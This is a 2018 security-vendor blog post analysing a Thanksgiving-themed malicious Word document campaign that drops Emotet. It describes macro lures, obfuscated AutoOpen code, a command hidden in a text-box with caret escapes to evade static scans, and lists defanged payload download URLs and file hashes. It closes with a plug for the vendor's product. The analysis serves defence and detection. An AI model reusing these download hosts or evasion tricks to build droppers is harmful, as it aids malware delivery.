hamburger

BitDam Blog

Roy Rashti
Roy Rashti
3 minutes & 1 second read · November 20, 2018

Thanksgiving malware campaign

Happy thanksgiving… or is it?

In the last few days, BitDam detected several different malicious files that drop malware, many with names related to Thanksgiving.

The files, holding names such as “Thanksgiving-wishes.doc”, “Thanksgiving-greeting-card.doc” or “Greeting-Card-Thanksgiving-Day.doc”, pretend to be a nice and innocent Thanksgiving card.

A quick glance shows that when BitDam detected those files, they all had relatively low detection rate on VirusTotal (around 6% detection rate). This number is obviously growing as we speak. Why? As these files became popular, other engines adjusted their signatures to detect them.

I was interested to see what differs in those files that made them harder to detect. I randomly picked one – (Sha1 09b4a05719b24789c2a0511184ccd8ffc0a08ea0; Sha256 ed642de0c3636ede6a55294dd38d44a91ca69b07f9ce5d11cfbcf5f84b32aa2f), and here are the findings:

Attack analysis

When opening the file, it shows a screen that tries to lure the user into enabling macros as shown in Figure1.

Figure 1

A quick glance into the macro shows an ‘AutoOpen’ function that will run as soon as the file is loaded. The function contains obfuscated code. The attackers are using mathematical operations such as Sin, multiplication, division and so on.

Seeing such techniques is not rare when it comes to code obfuscation. I’m sure that most engines are used to handle such techniques. However, there was something that did catch my eye; It seems that the attackers tried to hide something inside an OLE object.

The code shown in Figure2 highlights the access to the text inside this object.

Figure 2

Let’s roll back for a second. If we take a closer look at Figure1, or the screen we see when the document is loaded, we can see something odd in the top left corner. I highlighted it in Figure3.

Figure 3

That small black square is a text-box. Enlarging the text-box reveals its actual value, which is an obfuscated CMD line, shown in Figure 4.

Figure 4

In the end of the function, the VBA script executes a command prompt with the data shown above. It’s easy to spot the ‘^’, which is used as an escape character and in this case – used to fool static scans.

My personal opinion is that using the text-box object and accessing it through code is the differentiator that helped the attackers bypass many solutions at this time.

The obfuscated CMD line is used to start a Powershell process with the code shown in Figure 5.

Figure 5

I think that the code is self-explanatory; The attackers try to download the payload from the following domains-

htt[p]://raidking.com/a0pbDSCu

htt[p]://madisonda.com/zofBoIdrX1

htt[p]://boxofgiggles.com/JDKBKAac8m

htt[p]://carminewarren.com/D7kEg2A3a

htt[p]://chefshots.com/21dJDQqroG

The payload (Sha1 38eba0f30f4ae52916ba75f10d30376c675bda6e, Sha256 db5794255ef6c3f576d39fc8b69ec3af020a1a30dcacfbc25c6fa176fe40445e) seems to be Emotet, one of the famous malwares of 2018.

Here are some other droppers using similar techniques (Sha1s):

  • 7482ff036f86b35288fdd78bb159e883f911f08f
  • 747c1de46ef95cf12543a0c9e61529fdad9da96b
  • bb277708c03a5f3d4b76f82563a68312a6424981

How come it wasn’t detected?

How come that this attack bypassed 94% of the engines listed on VirusTotal? I guess that being reactive rather than proactive makes the big different. Again. Unlike other solutions, BitDam detects any malicious file, no matter if it’s known, a variation of a known file or completely unknown. Check it out yourself for free here.